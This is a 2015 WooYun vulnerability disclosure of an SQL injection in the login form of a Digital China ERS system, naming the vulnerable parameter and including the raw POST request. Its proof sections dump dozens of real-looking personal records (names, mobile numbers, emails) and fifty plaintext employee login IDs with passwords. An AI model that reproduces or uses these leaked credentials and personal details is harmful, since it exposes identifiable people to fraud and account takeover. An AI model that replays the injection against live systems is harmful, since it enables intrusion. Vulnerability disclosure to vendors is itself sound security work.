当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140209

漏洞标题:神州数码某业务系统SQL注入(百万用户泄露/姓名/手机/邮箱)

相关厂商:digitalchina.com

漏洞作者: 深度安全实验室

提交时间:2015-09-10 15:40

修复时间:2015-10-19 17:04

公开时间:2015-10-19 17:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-10: 细节已通知厂商并且等待厂商处理中
2015-09-10: 厂商已经确认,细节仅向厂商公开
2015-09-20: 细节向核心白帽子及相关领域专家公开
2015-09-30: 细节向普通白帽子公开
2015-10-10: 细节向实习白帽子公开
2015-10-19: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

rt

详细说明:

神州数码ERS(企业运行系统)

http://servexpress.digitalchina.com/kuwei/login.aspx


如下链接存在SQL注入,其中,tbUserName参数存在问题

POST /kuwei/login.aspx HTTP/1.1
Host: servexpress.digitalchina.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://servexpress.digitalchina.com/kuwei/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 235
__VIEWSTATE=%2FwEPDwULLTIwODc3MDcwOTFkZIkZFzpwA8d1FNax7clULpKJTLx4&__VIEWSTATEGENERATOR=DFA04AFB&__EVENTVALIDATION=%2FwEWBALt%2BoOECgLyj%2FOQAgLAr6WkDAKC3IeGDNdTTbqFnv4Z3Si53LdEQHxhpOct&tbUserName=a&tbPwd=1&btnLogin=%E7%99%BB+%E9%99%86

1.jpg

漏洞证明:

13个库

2.jpg


以ERS库为例,发现接近千万的数据表

back-end DBMS: Oracle
Database: ERS
+--------------------------+---------+
| Table                    | Entries |
+--------------------------+---------+
| BARCODE_AMD              | 9831947 |
| LOGIN_LIST               | 4143080 |
| CUST                     | 2719840 |
| PERSON_INF               | 2393879 |
| CCS_DELL_RESULT          | 1154633 |
| CCS_DIAL_RECORD          | 1153564 |
| MAIL                     | 1056880 |
| CCS_CASE_STEP            | 884353  |
| CCS_CASE                 | 854856  |
| SMS_INF                  | 834816  |
| HITACHI_HD_INF           | 784146  |
| CCS_SATISFY              | 622292  |
| P_M_INF                  | 583619  |
| CCS_ERS_TASK             | 511110  |
| CCS_ERS_RESULT           | 511090  |


J_USERS_INF表泄露的用户信息,包括:姓名、手机号码、邮箱等

Database: ERS
Table: J_USERS_INF
[50 entries]
+---------+-----------+-----------------------------+------------------+-----------+
| USER_ID | USER_NAME | E_MAIL_NBR                  | MOBILE_NBR       | CREATE_AT |
+---------+-----------+-----------------------------+------------------+-----------+
| 142     | 余骅        | yh1718844@163.com           | 13811862770      | 06-6月 -12 |
| 143     | 王伟龙       | wang.we@otto-fuchs.cn       | 15142079527      | 06-6月 -12 |
| 144     | 邹坤        | NULL                        | 13207184555      | 06-6月 -12 |
| 145     | 郭久阳       | NULL                        | 13478275275      | 06-6月 -12 |
| 146     | 彬安龙       | NULL                        | 13951650242      | 06-6月 -12 |
| 147     | 陈东        | toshiba_toyou@163.com       | 13802097913      | 06-6月 -12 |
| 148     | 刘文生       | NULL                        | 15641116787      | 06-6月 -12 |
| 149     | 滕乐鹏       | qdlhlenovo@163.com          | 13780628850      | 06-6月 -12 |
| 150     | 黄彦雷       | NULL                        | 13526876737      | 06-6月 -12 |
| 151     | 项目运维1     | huangxinga@digitalchina.com | 15101575802      | 13-6月 -12 |
| 171     | ceshi     | zhuyuee@digitalchina.com    | 1111111111111111 | 14-6月 -12 |
| 191     | 许悦        | xuyuea@digitalchina.com     | 13801210184      | 17-7月 -12 |
| 211     | 刘鹏        | liupengr@DIGITALCHINA.COM   | 13675167290      | 20-7月 -12 |
| 231     | 李国煦       | njkf@dc                     | 13815852208      | 20-7月 -12 |
| 232     | 朱世林       | zhusl@digitalchina.com      | 13390912340      | 20-7月 -12 |
| 233     | 马宁        | maningb@digitalchina.com    | 13601128959      | 20-7月 -12 |
| 251     | 吴蝶玲       | wudl@dcservice.cn           | 13711011390      | 26-7月 -12 |
| 271     | 李新鹏       | lixpd@digitalchina.com      | 15801239816      | 11-10月-12 |
| 291     |           | lixinpeng530@163.com        | 15801239816      | 30-10月-12 |
| 311     | 郭文莉       | Guowlc@digitalchina.com     | 13918683154      | 21-11月-12 |
| 591     | 扬子        | wangdayangzi@163.com        | 13512803668      | 07-3月 -13 |
| 611     | 佛山禅城      | kas@fshead.com              | 13929936931      | 08-3月 -13 |
| 631     | 黄佳斌       | NULL                        | 18925663588      | 12-3月 -13 |
| 651     | 绍兴        | zhang_yf1982@126.com        | 18657580084      | 12-3月 -13 |
| 652     | 安大威       | NULL                        | 18241206034      | 12-3月 -13 |
| 511     | 王晓山       | lxjt_shan@163.com           | 13911253890      | 28-2月 -13 |
| 512     |           | lixpd@digitalchina.com      | 15801239816      | 28-2月 -13 |
| 531     | 李永强       | NULL                        | 13511071894      | 01-3月 -13 |
| 551     | CallCent  | NULL                        | NULL             | 01-3月 -13 |
| 571     | test2     | NULL                        | NULL             | 05-3月 -13 |
| 653     | 南通        | ccc3033@dcmro.com           | 18021383265      | 12-3月 -13 |
| 654     | 庄子丹       | 13773505901@163.com         | 18036261352      | 12-3月 -13 |
| 671     | 曲福渔       | 33054837@qq.com             | 13303175756      | 13-3月 -13 |
| 691     | 董秋花       | ccc3007@dcmro.com           | 13729965503      | 14-3月 -13 |
| 692     | 李艳梅       | liym@dcservice.cn           | 13824296001      | 14-3月 -13 |
| 693     | 鞍山        | 253581833@qq.com            | 13998008046      | 14-3月 -13 |
| 694     | 陈健宙       | 19397500@qq.com             | 18927705666      | 14-3月 -13 |
| 711     | 包头-韩烨     | ccc4003@dcmro.com           | 15848668078      | 15-3月 -13 |
| 731     | 向兵        | NULL                        | 13013613016      | 16-3月 -13 |
| 751     | 周海亮       | lukeshuma@163.com           | 13455730555      | 18-3月 -13 |
| 771     | 王剑平       | tfbenq@vip.sina.com         | 13905523293      | 19-3月 -13 |
| 772     | 曾小芹       | 5659567@qq.com              | 18970333373      | 19-3月 -13 |
| 791     | 王远方       | NULL                        | 13917287914      | 24-3月 -13 |
| 792     | NULL      | NULL                        | NULL             | 24-3月 -13 |
| 811     | 李松        | 2444736793@qq.com           | 15641801930      | 27-3月 -13 |
| 831     | 房俊峰       | fangjunfeng2002@163.com     | 13834584172      | 09-4月 -13 |
| 851     | 李照磊       | lizlg@digitalchina.com      | 15901925646      | 15-4月 -13 |
| 871     | 陈炳宗       | NULL                        | 15805081052      | 15-4月 -13 |
| 891     | 江洋        | NULL                        | 15999675518      | 15-4月 -13 |
| 911     | 赵迎        | xzrbgs@126.com              | 13685124537      | 17-4月 -13 |
+---------+-----------+-----------------------------+------------------+-----------+

修复方案:

DIC_USERS表泄露的用户信息,包括:用户名、密码等,密码还是明文存储的

Database: ERS
Table: DIC_USERS
[50 entries]
+---------+-------------+--------------+-----+-------------+----------------------+
| USER_ID | LOGIN_ID    | PASSWORD     | M1  | M2          | LAST_UPDATE_PWD_DATE |
+---------+-------------+--------------+-----+-------------+----------------------+
| 10140   | dc-fucx1    | zzzzzz1      | nec | dc-fucx1    | 2015-04-01 15:56:26  |
| 10141   | xa-songzy   | song123      | nec | xa-songzy   | 2009-10-09 09:38:18  |
| 10142   | bj-zhaoyan  | 885669       | nec | bj-zhaoyan  | 2001-01-01 00:00:00  |
| 10144   | dc-lyq      | 1qa23z       | nec | dc-lyq      | 2012-03-12 11:48:43  |
| 10145   | sh-kl       | 64661559kl   | nec | sh-kl       | 2011-09-07 18:27:12  |
| 10146   | bj2-yzy     | yzy          | nec | bj2-yzy     | 2001-01-01 00:00:00  |
| 10147   | wh-lvyp     | lyp811214    | nec | wh-lvyp     | 2008-12-15 10:10:58  |
| 10148   | sy-huanghai | huanghai     | nec | sy-huanghai | 2001-01-01 00:00:00  |
| 10149   | bj-libr     | libr         | nec | bj-libr     | 2001-01-01 00:00:00  |
| 10150   | bj-liujd    | 12345        | nec | bj-liujd    | 2001-01-01 00:00:00  |
| 10151   | xa-liwq     | 123456l      | nec | xa-liwq     | 2015-04-01 14:24:12  |
| 10152   | dc-syl      | enter        | nec | dc-syl      | 2001-01-01 00:00:00  |
| 10153   | bj-lj       | lijiae1      | nec | bj-lj       | 2009-10-09 10:58:50  |
| 10154   | bj-fuqh     | fuqh         | nec | bj-fuqh     | 2001-01-01 00:00:00  |
| 10155   | dc-zb       | zhaobin7879  | nec | dc-zb       | 2014-06-16 17:59:19  |
| 10156   | nj-zt       | nj           | nec | nj-zt       | 2001-01-01 00:00:00  |
| 10157   | bj-fanyj    | blfiqpgf     | nec | bj-fanyj    | 2001-01-01 00:00:00  |
| 10158   | bj-jl       | akuma820809  | nec | bj-jl       | 2001-01-01 00:00:00  |
| 10159   | bj2-jl      | akuma820809  | nec | bj2-jl      | 2001-01-01 00:00:00  |
| 10160   | bj2-mn      | maning122802 | nec | bj2-mn      | 2013-02-21 14:29:31  |
| 10161   | bj2-fyj     | 198000       | nec | bj2-fyj     | 2001-01-01 00:00:00  |
| 10162   | bj-xzm      | xzm          | nec | bj-xzm      | 2001-01-01 00:00:00  |
| 10163   | sh-zxl      | zxl321       | nec | sh-zxl      | 2015-04-03 14:39:05  |
| 10164   | bj-zhy      | zhy123       | nec | bj-zhy      | 2013-07-08 09:16:43  |
| 10165   | dc-cc       | dccc800      | nec | dc-cc       | 2015-06-26 09:25:13  |
| 10166   | bj-lbw      | 5211314      | nec | bj-lbw      | 2001-01-01 00:00:00  |
| 10167   | sh-lx       | anad0728     | nec | sh-lx       | 2015-05-08 18:08:50  |
| 10168   | dc-sqj      | 13301353150  | nec | dc-sqj      | 2001-01-01 00:00:00  |
| 10170   | dc-wwj      | 0606wwj      | nec | dc-wwj      | 2011-09-14 09:42:55  |
| 10171   | dc-wg       | newpass123x  | nec | dc-wg       | 2013-09-23 15:13:00  |
| 10173   | bj-hxq      | hxq000       | nec | bj-hxq      | 2015-01-23 09:20:29  |
| 10175   | sh-zsy      | tos901       | nec | sh-zsy      | 2014-05-13 16:15:57  |
| 10176   | wh-lly      | asd321       | nec | wh-lly      | 2014-03-28 12:35:06  |
| 10177   | sz-tzy      | NONE         | nec | sz-tzy      | 2001-01-01 00:00:00  |
| 10178   | bj-ty       | ty19710401   | nec | bj-ty       | 2008-12-31 15:16:16  |
| 10179   | bj-ln       | 1234         | nec | bj-ln       | 2001-01-01 00:00:00  |
| 10180   | bj-mn       | 19810802     | nec | bj-mn       | 2001-01-01 00:00:00  |
| 10181   | bj-wl       | 741852pp     | nec | bj-wl       | 2013-07-04 18:44:50  |
| 10182   | bj-jxl      | ooo          | nec | bj-jxl      | 2001-01-01 00:00:00  |
| 10183   | dc-nw       | 781029       | nec | dc-nw       | 2001-01-01 00:00:00  |
| 10184   | jn-zl       | 123asd       | nec | jn-zl       | 2009-10-16 15:38:12  |
| 10185   | nj-zxy      | zxy          | nec | nj-zxy      | 2012-07-05 14:19:53  |
| 10186   | dc-zhuhj    | aaa111       | nec | dc-zhuhj    | 2014-06-06 11:21:41  |
| 10187   | dc-niewei   | 456          | nec | dc-niewei   | 2001-01-01 00:00:00  |
| 10188   | nec-jzq     | nec12345     | nec | nec-jzq     | 2009-01-05 13:57:29  |
| 10189   | 10189       | lizhb2009    | nec | cd-zhouzh   | 2010-09-21 18:17:24  |
| 10190   | nec-zq      | nec111       | nec | nec-zq      | 2009-03-12 17:55:26  |
| 10191   | nec-zgyj    | 11111        | nec | nec-zgyj    | 2001-01-01 00:00:00  |
| 10192   | nec-hy      | 12345678     | nec | nec-hy      | 2001-01-01 00:00:00  |
| 10193   | dc-yangqian | 42yangqian   | nec | dc-yangqian | 2014-07-15 11:35:09  |
+---------+-------------+--------------+-----+-------------+----------------------+

版权声明:转载请注明来源 深度安全实验室@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-09-10 16:44

厂商回复:

尽快处理,谢谢!

最新状态:

2015-10-19:已修复

漏洞评价:

评论